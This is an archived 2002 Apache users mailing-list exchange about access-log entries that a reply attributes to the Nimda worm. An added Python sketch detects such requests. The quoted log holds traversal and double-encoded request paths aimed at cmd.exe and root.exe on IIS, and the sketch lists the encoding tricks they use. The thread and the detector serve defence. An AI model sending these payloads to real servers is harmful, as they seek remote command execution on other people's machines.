httpd-users mailing list archives

From Mike Hodson <m...@mystica.cx>
Subject Re: access log
Date Fri, 19 Apr 2002 10:36:07 GMT
These are the telltale symptoms of someone on the internet who has the
NIMDA internet worm, which thankfully only affects Microsoft IIS users.
Though having countless log entries from this crap undoubtedly affects
all of us, Unix users included.

Odds are it is someone who uses the same ISP you do, but they either
have no clue it is on their systems, or have not yet run the latest
patches/virus scanners. It's not your problem, and it's probably not
theirs either. I've had 170,000 log entries from NIMDA, and there are no
signs it's even slowing down. :(


On Fri, 19 Apr 2002 10:43:04 +0200
"Robert Douglass" <r.douglass@onlinehome.de> wrote:

> Hello, I've been hosting a tiny website from my home for the past week, as a
> temporary project, and I found the following in my access log:
> 
> "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290
> "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 288
> "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
> "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
> "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
> "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345
> "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
> "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
> "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
> "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
> "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295
> "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295
> "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
> "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
> 
> Does anybody have an idea what someone was trying to accomplish with this,
> or if these requests may have originated from my ISP? Does anybody have any
> suggestions on how to implement some basic security (I've done nothing!) to
> protect myself? I'm using Apache 1.3.22. Thank you,
> 
> Robert Douglass
> 
> 
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org

-- 
Mike Hodson  <mike@mystica.cx>
IRC: irc.mystica.cx #mystica or /msg me if I'm not actively talking.
ICQ: 18145059
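
An added example, not part of either message above: a Python sketch that flags requests like the quoted ones in an Apache access log, tallies them per client, and lists any that did not receive an error status. The request strings in `SAMPLE` come from the quoted log; the host addresses, timestamps and tag names are constructed for this example.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# Common Log Format: host ident user [time] "METHOD path PROTO" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:\S+) (\S+)[^"]*" (\d{3}) ')
TARGETS = (b"cmd.exe", b"root.exe")  # executables requested in the quoted log

def classify(path: str) -> set:
    """Return tags describing why a request path looks like one of these probes."""
    raw, rounds = path.encode("utf-8"), 0
    while rounds < 5:                       # %255c -> %5c -> backslash
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw, rounds = decoded, rounds + 1
    raw = raw.lower()
    tags = set()
    if any(t in raw for t in TARGETS):
        tags.add("iis-executable")
    if b"../" in raw or b"..\\" in raw:
        tags.add("traversal")
    if rounds > 1:                          # needed more than one decoding pass
        tags.add("multi-encoded")
    if b"\xc0" in raw or b"\xc1" in raw:    # bytes that never occur in valid UTF-8
        tags.add("invalid-utf8")
    return tags

def summarize(lines):
    """Count probes per client and collect any that did not get a 4xx/5xx."""
    per_host, answered = Counter(), []
    for line in lines:
        m = CLF.match(line)
        if m and "iis-executable" in classify(m.group(2)):
            per_host[m.group(1)] += 1
            if int(m.group(3)) < 400:       # not an error response: look closer
                answered.append(line)
    return per_host, answered

# Constructed sample: hosts and timestamps are made up (documentation address ranges).
SAMPLE = [
    '192.0.2.10 - - [19/Apr/2002:08:01:00 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290',
    '192.0.2.10 - - [19/Apr/2002:08:01:01 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312',
    '192.0.2.10 - - [19/Apr/2002:08:01:02 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311',
    '192.0.2.10 - - [19/Apr/2002:08:01:03 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295',
    '192.0.2.77 - - [19/Apr/2002:08:02:00 +0200] "GET /index.html HTTP/1.0" 200 1024',
    '198.51.100.4 - - [19/Apr/2002:08:03:00 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312',
]
if __name__ == "__main__":
    print(summarize(SAMPLE))
```

An empty second list means every matching request was answered with a 4xx or 5xx status, as in the log quoted above.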

